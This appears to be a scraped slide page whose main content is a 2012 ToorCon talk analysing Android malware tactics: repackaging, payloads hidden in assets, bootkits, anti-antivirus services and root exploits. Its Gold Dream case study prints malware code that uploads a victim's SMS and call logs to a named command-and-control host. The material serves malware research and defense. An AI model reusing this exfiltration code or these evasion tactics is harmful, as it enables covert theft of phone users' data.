Similar to ToorCon 14 : Malandroid : The Crux of Android Infections (20)
Emerging Trends in Online Social Networks MalwareAditya K Sood
Emerging trends in Social Networks Malware.
Social networks, such as Facebook, Twitter, and others pose a grave
threat to the security and privacy of users. This presentation highlights malware infection strategies
used by attackers to infect social networking websites and addresses security from the user
perspectives—outlining effective, secure steps that can reduce the impact of malware infections
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
Attackers are targeting MongoDB instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MongoDB instances and trigger infections at scale to exfiltrate data, destruct data, and extort money via ransom.
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
Strafer is a tool created by Dr. Aditya K Sood and Rohit Bansal to detect potential infections in Elasticsearch instances. It gathers instance information, checks for exposure online and authentication, and detects infections like ransomware, botnets, and honeypots. The open source tool is available on GitHub and aims to strengthen security efforts by sharing research with the community.
DEF CON 20 - Botnets Die Hard - Owned and OperatedAditya K Sood
This document discusses botnets and how they spread. It begins with an introduction of the speakers and their backgrounds. The agenda then covers bot spreading mechanisms like browser exploit packs and drive-by downloads. It discusses post exploitation techniques used by bots, including understanding the Ruskill module and how DNS changers work. It ends with a discussion of exploiting browsers for data exfiltration.
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Aditya K Sood
This document summarizes a presentation given at the HOPE Conference in New York in July 2012 about advancements in botnet attacks and malware distribution. The presentation covered topics like browser malware taxonomy, current malware propagation tactics like exploiting web hosting vulnerabilities and browser exploit packs, information stealing tactics using man-in-the-browser attacks and web injects, and emerging threats around social engineering and abusing cloud services. Live demonstrations of malware samples and infection chains were also provided to illustrate how modern botnets operate. The goal was to educate attendees on the realities of internet threats and how malware authors have improved their techniques.
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Aditya K Sood
The document summarizes research analyzing the BlackHole browser exploit pack (BEP), one of the most widely used BEPs. The researchers collected samples of the BlackHole BEP over 3 months and analyzed its source code to understand exploitation techniques. Their analysis found the BlackHole BEP uses an AJAX-based framework to track infected machines and supports custom widgets. It also exploits browser vulnerabilities through techniques like heap spraying and uses obfuscation to avoid detection.
Commercial Cyber Crime - Social Networks MalwareAditya K Sood
Social networks are vulnerable launch pads for malware infections due to insufficient security protections. Attackers can exploit human emotions and curiosity to spread malicious content through social networks. Common techniques include injecting malicious URLs or exploiting browser vulnerabilities to download malware. The lack of URL scanning, warning mechanisms, and user knowledge about authenticity make social networks easy targets for these types of attacks.
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Aditya K Sood
The document discusses browser exploit packs (BEPs), which bundle multiple exploits to target browser vulnerabilities. It describes the underground malware economy that fuels BEPs and outlines the key components and techniques used in BEP frameworks, including exploit obfuscation, fingerprinting, geo-location tracking to limit infections, and dynamic storage to control exploit delivery. The document also examines how BEPs collaborate with botnets for wider infection and exfiltration of stolen data.
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
This document summarizes a presentation on hunting web malware as a "good hacker" or malware hunter. It discusses browser malware taxonomy, strategies attackers use to infect websites like iframe injections and compromised servers, and methodology for analyzing website traffic dumps to extract malware. It includes two case studies: one on taking down the BlackHole Exploit Pack and another on conducting a SQL injection attack against a SpyEye botnet command and control server. The presentation emphasizes the penetration testing skills and understanding of malware and exploits needed to rigorously hunt for web malware.
This document proposes a taxonomy for classifying browser malware. It divides browser add-ons into extensions, which are part of the browser, and plug-ins, which are separate programs connected to the browser. The taxonomy is based on how malware exploits security vulnerabilities in browser components, plug-ins, and operating system layers. Browser malware circumvents browser functionality or uses the browser as a platform to infect operating systems. The taxonomy aims to provide insight into browser malware techniques and assist defense development.
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...Aditya K Sood
This document discusses browser malware and botnets. It provides a taxonomy of browser malware classes and describes how bots and browsers can work collaboratively. Bots use custom SDKs and plugins to communicate with command and control servers using the browser interface. The document outlines how bots can exploit browsers to inject content and download other malware. It also describes how bots can fingerprint browsers, use browser exploit packs, take screenshots, grab form data, and steal credit card numbers by manipulating the browser.
PenTest Magazine Teaser - Mobile HackingAditya K Sood
This document discusses penetration testing of Apple iOS devices and applications. It begins by providing background on the Mach-O binary format used for programs on Apple devices. This format includes a header structure, load structure, and data structure. The header specifies environment information and the load structure defines memory segments. When executed, segments map bytes to virtual memory. The document then focuses on behavioral testing and security issues for iOS devices and applications. It identifies classes of issues that should be checked during penetration testing, including authentication, authorization, input validation, encryption, and more. The goal is to evaluate security across confidentiality, integrity, and availability.
Dissecting Java Server Faces for Penetration Testing Aditya K Sood
This document discusses security testing of the Java Server Faces (JSF) web framework. It begins with an overview of JSF and its security architecture, then analyzes potential vulnerabilities through penetration testing techniques, including issues with view state handling, cross-site request forgery protection, security descriptor configuration, and input validation. The document provides examples of vulnerabilities found and recommendations for more secure implementations.
VxWorks - Holistic Security (Art of Testing)Aditya K Sood
The document discusses security issues related to the VxWorks operating system and firmware. It provides an overview of the VxWorks architecture and fault management system. It then analyzes vulnerabilities in the VxWorks OS security model, network stack, debugging interface, and firmware configuration. Finally, it discusses threats facing embedded devices like weak security practices.
Toorcon Seattle 2011 - Browser Exploit PacksAditya K Sood
The document discusses browser exploit packs and related tactics. It provides an overview of the generic browser exploit pack framework, including how it fingerprints the victim environment, supports exploit delivery through JavaScript and DOM objects, and triggers exploits. It then covers specific tactics used in browser exploit packs, such as plugin detection and verification, string obfuscation, user agent fingerprinting, and drive-by downloads. The document concludes with a discussion of future work analyzing malware domains and hacking techniques.
Art of InfoJacking, Source Conference Seattle, 2011Aditya K Sood
The document discusses techniques used by web network devices and security appliances to conceal internal details and manage traffic. It describes how devices like WAFs and load balancers use HTTP cloaking to serve different content to search engines versus users to hide sensitive information. It also discusses how these devices implement layer 7 policies, content switching, HTTP request normalization, custom response headers, and cookie/session management to direct and modify traffic flowing through them.
Malicious browser extensions can exploit the monolithic and shared namespace design of browsers to steal sensitive user information. They use standard extension APIs and encrypted communications to update other extensions and access browser plugins and vulnerabilities. The browser architecture does not sufficiently restrict extensions' control over browser components or compartmentalize components with customized access policies.
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?Aditya K Sood
The document discusses the SpyEye malware framework. It provides an overview of SpyEye's chronology and versions. It describes the key components of SpyEye including the builder used to generate bots, the main administration panel, backend collector to store stolen data, and the bots themselves. It examines SpyEye's browser manipulation tactics such as web injects and fakes. Additional SpyEye components like plugins, modules, and the bot development kit are also covered. The document aims to provide a technical understanding of SpyEye's architecture and operation.
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIVladimir Iglovikov, Ph.D.
Presented by Vladimir Iglovikov:
- https://www.linkedin.com/in/iglovikov/
- https://x.com/viglovikov
- https://www.instagram.com/ternaus/
This presentation delves into the journey of Albumentations.ai, a highly successful open-source library for data augmentation.
Created out of a necessity for superior performance in Kaggle competitions, Albumentations has grown to become a widely used tool among data scientists and machine learning practitioners.
This case study covers various aspects, including:
People: The contributors and community that have supported Albumentations.
Metrics: The success indicators such as downloads, daily active users, GitHub stars, and financial contributions.
Challenges: The hurdles in monetizing open-source projects and measuring user engagement.
Development Practices: Best practices for creating, maintaining, and scaling open-source libraries, including code hygiene, CI/CD, and fast iteration.
Community Building: Strategies for making adoption easy, iterating quickly, and fostering a vibrant, engaged community.
Marketing: Both online and offline marketing tactics, focusing on real, impactful interactions and collaborations.
Mental Health: Maintaining balance and not feeling pressured by user demands.
Key insights include the importance of automation, making the adoption process seamless, and leveraging offline interactions for marketing. The presentation also emphasizes the need for continuous small improvements and building a friendly, inclusive community that contributes to the project's growth.
Vladimir Iglovikov brings his extensive experience as a Kaggle Grandmaster, ex-Staff ML Engineer at Lyft, sharing valuable lessons and practical advice for anyone looking to enhance the adoption of their open-source projects.
Explore more about Albumentations and join the community at:
GitHub: https://github.com/albumentations-team/albumentations
Website: https://albumentations.ai/
LinkedIn: https://www.linkedin.com/company/100504475
Twitter: https://x.com/albumentations
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionAggregage
Join Maher Hanafi, VP of Engineering at Betterworks, in this new session where he'll share a practical framework to transform Gen AI prototypes into impactful products! He'll delve into the complexities of data collection and management, model selection and optimization, and ensuring security, scalability, and responsible use.
How to Get CNIC Information System with Paksim Ga.pptxdanishmna97
Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfMalak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Full-RAG: A modern architecture for hyper-personalizationZilliz
Mike Del Balso, CEO & Co-Founder at Tecton, presents "Full RAG," a novel approach to AI recommendation systems, aiming to push beyond the limitations of traditional models through a deep integration of contextual insights and real-time data, leveraging the Retrieval-Augmented Generation architecture. This talk will outline Full RAG's potential to significantly enhance personalization, address engineering challenges such as data management and model training, and introduce data enrichment with reranking as a key solution. Attendees will gain crucial insights into the importance of hyperpersonalization in AI, the capabilities of Full RAG for advanced personalization, and strategies for managing complex data integrations for deploying cutting-edge AI solutions.
20 Comprehensive Checklist of Designing and Developing a WebsitePixlogix Infotech
Dive into the world of Website Designing and Developing with Pixlogix! Looking to create a stunning online presence? Look no further! Our comprehensive checklist covers everything you need to know to craft a website that stands out. From user-friendly design to seamless functionality, we've got you covered. Don't miss out on this invaluable resource! Check out our checklist now at Pixlogix and start your journey towards a captivating online presence today.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
ToorCon 14 : Malandroid : The Crux of Android Infections
1. ToorCon 14 Security Conference, San Diego, 17 – 21 October 2012
Aditya K Sood (Senior Security Practitioner)
IOActive| Department of Computer Science and Engineering
Michigan State University
{Malandroid} – The Crux of Android
Infections
2. 2
Whoami !
Aditya K Sood
● Senior Security Practitioner – IOActive
● PhD Candidate at Michigan State University
– Worked for Armorize, COSEINC, KPMG and others.
– Active Speaker at Security conferences
» DEFCON, RSA, SANS, HackInTheBox, OWASP AppSec, BruCon and others
– LinkedIn - http ://www.linkedin.com/in/adityaks
– Website: http://www.ioactive.com
– Twitter: @AdityaKSood
3. 3
Agenda
Android Security Overview
Insidious Infection Tactics – Design Strategies
Reversing Android Malware – A Case Study
Chinese Alternate Markets - Connecting Dots
Existing Android Defenses
Big Problems in Android
Conclusion
4. 4
In This Talk !
We Study the Interesting Tactics in the Android
Malware from 2011 – until now !
6. 6
Android - Vulnerabilities and Exploits
Vulnerabilities Explanations
Zimperlich
[2.2.0, 2.2.1 , 2.2.2]
RageAgainstTheCage - Android’s Zygote process failed to check the return value
of setuid (2)
ZergRush
[2.2,2.3]
Android’s libsysutils allows the code execution to with command arguments to
bypass system controls. [CVE-2011-3874]
Wunderbar Privilege escalation in mmap_min_addr (null pointer dereference )
Mempodroid
[4.0 (0-3)]
Arbitrary memory writing in setuid’s address space by exploiting vulnerability in
/proc/pid/mem [CVE-2012-0056]. Adb access required for exploitation.
Levitator Power VR Kernel module used for 3D graphic allows access to kernel memory
KillingInTheNameOf
[<= 2.2.2]
Ashmem - Custom shared memory allocator bug helps in rooting of devices.
[CVE-2011-1149]
Exploid
[ <= 2.1]
Init daemon (udev functionality) failed to check the origin of netlink messages
coming from kernel [CVE-2009-1185]. Hotplug (/proc/sys/kernel/hotplug) path
overwrite
Gingerbreak
[2.2.3, 2.3.[0–3], 3.0
Vold daemon failed to check the origin of netlink messages coming from kernel
[CVE-2011-1823]
WebKit
[ < 2.2]
Code execution - NaN handling in lack of validation in floating point number
[CVE-2010-1807]
8. 8
Android Platform Realities
Android Platform Realities
─ Huge improvement in security model but ………………
● Android provenance system
– Application masquerading (repackaging) is easy
● Permissions are user centric
– Explicitly relies on user’s knowledge to make smart decisions about security
– Its hard to imagine that every user is security driven or knowledgeable
● Encryption is offered in platforms beginning with version 3
– All the android versions < 3 do not have proper encryption model
» Once exploited, all data is completely open. No security for data at rest.
● No built-in mechanism to prevent social engineering and web trickeries
● Existence of alternative android application markets
– Highly risk driven from security point of view
– Increases the attack surface with mobility and flexibility
9. 9
Android Malware – What Matters?
Android Malware
─ Malware Hosting
● Legitimate android markets
● Alternate android markets
─ Delivery Model
● Websites, Drive-by Downloads, Malicious Attachments
─ The State of Devices
● Rooted android phones
● Unrooted android phones
─ Exploitation
● Root exploits from remote servers
– Dynamic loading capability of Dalvik Virtual Machine
● Root privileges
10. 10
Android Malware – Threats
Privacy Issues
Information Leakage
─ SMS/ Contacts/ Phone Identity Information (IMEI/IMSI) and others
Online Banking Frauds and Thefts
Targeted Attacks Against Corporate Networks
Android Botnets
Pivot Attacks Against GSM Networks
And Others ……..
12. 12
Android Malware – The Classics
Droid Kung Fu Plankton Root Smart Gold Dream Hippo SMS
Nicki Bot Anserver Bot Bean Bot Gold Dream Gambler SMS
Rogue SP Push Push Bot DFK Boot Kit FJCon TG Loader
Many More …
13. 13
Android Malware – Latest in Last Few Months
FakeLookout.A Plankton Variants FinFisher Fin Spy SMS Zombie
Android_Fakeinst.A Fake Lash Loozfon LuckyCat.A Android
VdLoader
Drop Dialer MMMarket Pay FindAndCall Android KunFu
Variants
Android C14
SMS bot
Many More
…
14. 14
Application Masquerading
Application Masquerading
─ Technique of hiding malicious application inside legitimate application
● Malicious payloads are compressed and embedded in other file formats
– Also termed as Repackaging
● Runtime unwrapping of malicious code
● Effective in hiding the real nature of application
● Invasive approach to bypass the security mechanisms
Legitimate Application
Masqueraded Application
15. 15
Stealthy Assets
Designing Stealthy Assets
─ Assets
● These are the extra set of resources that are packaged inside android applications
– Package path - <application bundle name>.apk/assets/
● Files stored in assets can be discovered dynamically using AssetManager.list()
● /assets should not be confused with custom /res/raw [ both are different]
– /assets support tree hierarchy where as /res/raw does not
– /assets do not require identifier for reference where as /res/raw does.
─ Characteristics
● Used heavily for hiding payloads and malicious code
● Example:- Designing malicious PNG files
– PNG files are used to hide payloads and used for compression
– Deployed by very first: Foncy/Madden FL Android Malware
● Malicious code is also embedded with a routine for extracting code in assets
during runtime
– Routine - Java byte code that interacts with asset manager
16. 16
Bootstrapping Payloads and Services
Bootstrapping
─ Detecting the completion of Android boot process
● Registering a system wide event
– android.intent.action.BOOT_COMPLETED
─ Starting hidden service
● Registering a malicious service in the backend
● Service monitors the state of Android phone
● Downloads other malicious packages when the phone is not active
– When user is not interacting with the phone
─ Service capabilities
● Monitors the state of various antivirus processes an kills them accordingly
● And many more ………….
─ Related Android Malware Examples – Gap II and Update Killer
17. 17
Android Bootkits – An Overview
Bootkits
─ Getting root privileges
● Hiding in legitimate applications that require root privileges
– Application masquerading / Piggy backing
─ Registering agent controller service
● Activates Boot Sequence Manipulation (BSM) agent
● BSM agent validates whether it has root privileges
● If yes, mounts the system partition (w+). If not, deletes itself
● BSM agent copies itself to /system/lib and alters several system programs ,
booting scripts and daemons.
─ Hijacking android framework initialization capabilities
● To execute custom packages before legitimate ones
● Example: Chinese Malware (DKF Bootkit)
18. 18
Custom Firmware Images
Android Custom Firmware Images
─ Enhanced stock ROMs (legitimate for more functionality)
─ Distributed in the underground or third-party forums
─ Modification allows:
● To gain certain privileges that are available to system only
● Altering the state of adb by modifying the ram disk
– Configuring build.prop to tweak ro.secure parameter
– Also possible through setting setprop shell command
● Manipulate the custom recovery options as per the requirement
– Custom recovery modes are driven with null security
─ Compiling custom Android using Android Open Source Project (AOSP)
● Generate a key at AOSP to sign custom images
● Makes custom images look more authentic
19. 19
Defending The Code
Android Custom Firmware Images
─ Obfuscation/Encryption
● Code
– Encrypting all the method names in the classes.
– Makes the invocation process more stealthier
● Network
– Encrypting the communication using aymmetric encryption
– Public keys are fetched dynamically
─ Anti Repackaging Check
● Verify the signature of the remote payload (application) before execution
– To scrutinize the payload has not been tampered
─ Antivirus Detection
● Attempts to bypass and shutdown the configured security applications
─ Example
● Most of the advanced Android bots use one of these capabilities.
20. 20
Time-based Code Execution
Delayed Execution
─ Inherent feature to make the malicious activity dormant for a certain period
of time
─ Upon installation, malicious application remains silent.
─ Malicious behavior is designed using :
● Time scheduler
● System uptime
● System time settings and time zones
● Connecting back to C&C server at a specific point of time
─ A good step in bypassing behavioral based detection
21. 21
Exploiting Administration API’s
Administration API’s
─ Device Administration API – supported since android 2.2 version
● Good : attractive feature to enabled developers to build enterprise applications
that require features at system level.
● Bad : Completely relies on user permission. If granted, policies are enforced
● Worst: Malicious applications are presented as Device Administration
applications. If allowed , works with similar set of permissions as system.
– Allows attackers to specify policies as hard coded or remotely.
─ Risks
● Malicious application leverages the benefit of system privileges.
● Malicious application can
– Wipe all the data from phone and restore the state to factory defaults
– Force users to follow the rogue policies
– Disabling certain features on the device.
22. 22
Mobile Malvertising
Mobile Malvertising
─ Started with the concept of mobile advertising
● Initial samples of android malware used this trick for advertising various
custom games and other business operations
─ Transforming mobile advertising into mobile malvertising
● Using advertising to download malicious payloads onto user mobiles
● Design/ development of malvertised applications
– Creating a SWF file using Flash or Flex.
» Create an image that is a part of resource file
– Create an XML file containing a description of the malvertised application.
– Run the packager. For android, install SDK and sign the malvertised application
– Host it on the third party android market and start distributing it.
– Once the phone installs it infection begins shortly.
23. 23
Hacktivism – Political Legacy
Hacktivism
─ Android malware has shown some facets of Hacktivism
● Sending messages containing political point or appeal
● Raising awareness about political mayhem in the respective country
– Well!, the user is going to pay for the messages !
» Malware does not contain any complex code
─ Spreading Hacktivism
● Sending messages about leaders, political chaos and support to other users
listed in contacts
● Morphing or replacing pictures present on user’s device
● Examples: (The very first Android samples)
– Android Arspam Alsalah promoting leader of Tunisian revolution
– Android Moghwa promoting leader of Iranian revolution 1979
24. 24
Mobile Droppers / Bots in Action
Mobile Droppers
─ Masqueraded applications that look legitimate and uses market brands such
as games etc to hide their potential functionality
─ Droppers download or extracts other malicious applications in the user
mobile in a stealthy manner
25. 25
Mobile Droppers / Bots in Action
Mobile Droppers
─ Peripheral Look
● Extracting strings
Mounting devices
Clearing logs (logcat –c)
IRC communication capability
Rooted device notification
Bot driven APK file embedded
in PNG file
26. 26
Mobile Droppers / Bots in Action
Mobile Droppers (Techniques)
─ Disassembly ARM instructions
● Malicious PNG file dissection
IRC Login call in action. STMFD
(Full Descending) call keep
on updating the stack pointer
as it grows
IRC Connect call in action.
ARM/ Thumb code in PNG files
27. 27
Mobile Droppers / Bots in Action
Mobile Dropper + Bot (Badging)
Dropper – Badging Information Permissions
Layout
Extracted Bot – Badging
Information
30. 30
Android Gold Dream
Android Gold Dream (com.gamelio.DrawSlasher)
● Upload files in a stealthy manner
● Files extracted
● Device information
● Calling capability
31. 31
Android Gold Dream
Android Gold Dream (com.gamelio.DrawSlasher)
─ URL fracturing Interesting code
» ((UploadFiles )localObject).uploadFile("http://" + getKeyNode("dom", "dom_v") +
"/zj/upload/UploadFiles.aspx?askId=1&uid=" + getKeyNode("uid", "uid_v"),
"/data/data/com.gamelio.DrawSlasher/files/zjsms.txt");
» ((UploadFiles) localObject).uploadFile("http://" + getKeyNode("dom", "dom_v") +
"/zj/upload/UploadFiles.aspx?askId=2&uid=" + getKeyNode("uid", "uid_v"),
"/data/data/com.gamelio.DrawSlasher/files/zjphonecall.txt");
─ So what are these dom, dom_v , uid, uid_v
● Target To get the full URL to find where the data is being uploaded
32. 32
Android Gold Dream
Android Gold Dream (com.gamelio.DrawSlasher)
─ The variables used in URL through getKeyNode are defined as local objects
● Local objects , why not to go for shared objects or shared preferences
● Data is pulled from /data/data/com.gamelio/DrawSlasher/sharedprefs
● All the local objects are stored as respective xml files
33. 33
Android Gold Dream
Android Gold Dream (com.gamelio.DrawSlasher)
─ The extracted URL’s are
– hxxp://lebar.gicp.net/zj/upload/UpdateParam.aspx?uid=0&taskTypeId=1&type=0
– hxxp://lebar.gicp.net/zj/upload/UploadFiles.aspx?askId=1&uid=
– hxxp://lebar.gicp.net
─ Domain information
38. 38
BrandJacking/{Typo | Cyber}squatting
Chinese android market is exploiting the integrity and brand
values of primary business domains.
Example: Android Doctor Domain
● hxxp://www.androiddoctor.com
– IP Address - 184.73.194.128 (USA)
● hxxp://www.androidoctor.com
– IP Address - 96.44.158.2 (China)
40. 40
Anserver Bot
Anserver Bot
● The detailed analysis has already presented here:
– Refer http://www.csc.ncsu.edu/faculty/jiang/pubs/AnserverBot_Analysis.pdf
How we want to take a look at it?
● The domain hxxp://sina.com.cn
– We are trying to connect the dots to map interesting set of information
41. 41
Connecting Dots ……….
Mapping Domains and History
● hxxp://www.sina.com.cn is high traffic oriented website in china
– Highly ranked | Lots of traffic from China (202.108.33.60)
– hxxp://blog.sina.com.cn | blogx.sina.com.cn is subdomain or blog hosted at it.
» Used for malicious activities (218.30.115.254)
42. 42
Connecting Dots ……….
Mapping Domains and History
● hxxp://www.sina.com (Network)
– Website : hxxp://www.sina.com.cn
43. 43
Connecting Dots ……….
Mapping Domains and History
● In 2009, there were some incidents of malware happened as described
– A registrant has an identification of sina.com.cn to register fuckunion.com
– Culprit domain : *.fuckunion.com
» FUCKUNION.COM critical and interesting
Sub domains still serve malware
44. 44
Connecting Dots ……….
Mapping Domains and History
● hxxp://www.fuckunion.com
The website is off recently.
47. 47
Android Malware – Defense
Malicious Apps Detection Tools by Different AntiVirus Vendors
● Privacy Leak Detection Frameworks
– TaintDroid and PioS
● Over Privilege and Permission Checker
– Stowaway
● Fine Grained Control Of System Resources
– Extensions – MockDroid, TISSA, Apex and AppFence
● Secure Policy Enforcement to Remove Exposed Interfaces
– Saint
● Static Analysis Tools
– Comdroid and Woodpecker
● Android Vulnerability Checker
– X Rays
● Android Google Play – Application Checker
– Bouncer
● SEAndroid is in building stage
49. 49
So Some Of The Big Problems Are …
No Code Signing
● Self signatures can be circumvented to repackage the applications
Native Code Execution
● No restriction on the privileges for setting execution bit (Root/Apps)
Permission Sandbox (All or None Policy)
– Actions without Permissions
» RECEIVE_BOOT_COMPLETED | START_ON_INSTALL
Existence of Alternate Market Places
Google Play (Android Market) Communication Channel Issues
No Robust Android Malware Detection at Network Level
Delayed Patch Process (Developers and Vendors)
Do Kill Switch (REMOVE_ASSET) or Bouncer Works Against
Modern Malware?
50. 50
And the Real World Question Is …
Do Users Really Care About Android
Malware?
51. 51
Conclusion
Users awareness is required !
More strong defenses are the need of the Time !
Malware flavors are going to change in the Android
world !
Malware will increase !
52. 52
Further Reading – Interesting Work
Android
─ Net Q Blog http://research.netqin.com/
─ Don’t Root Robots
http://safecomputing.umich.edu/events/sumit11/docs/dontrootrobots.pdf
─ http://jon.oberheide.org/files/shmoo11-teamjoch.pdf
─ Android Bouncer http://jon.oberheide.org/files/summercon12-bouncer.pdf
─ This is not the droid you are looking for,
https://www.defcon.org/images/defcon-18/dc-18-presentations/Trustwave-
Spiderlabs/DEFCON-18-Trustwave-Spiderlabs-Android-Rootkit-WP.pdf
─ Android Security Overview -http://source.android.com/tech/security/index.html
─ Dissecting Android Malware -
http://www.csc.ncsu.edu/faculty/jiang/pubs/OAKLAND12.pdf
─ Android Malware Data Set - http://www.malgenomeproject.org/
─ Droid Moss - http://www.csc.ncsu.edu/faculty/jiang/pubs/CODASPY12.pdf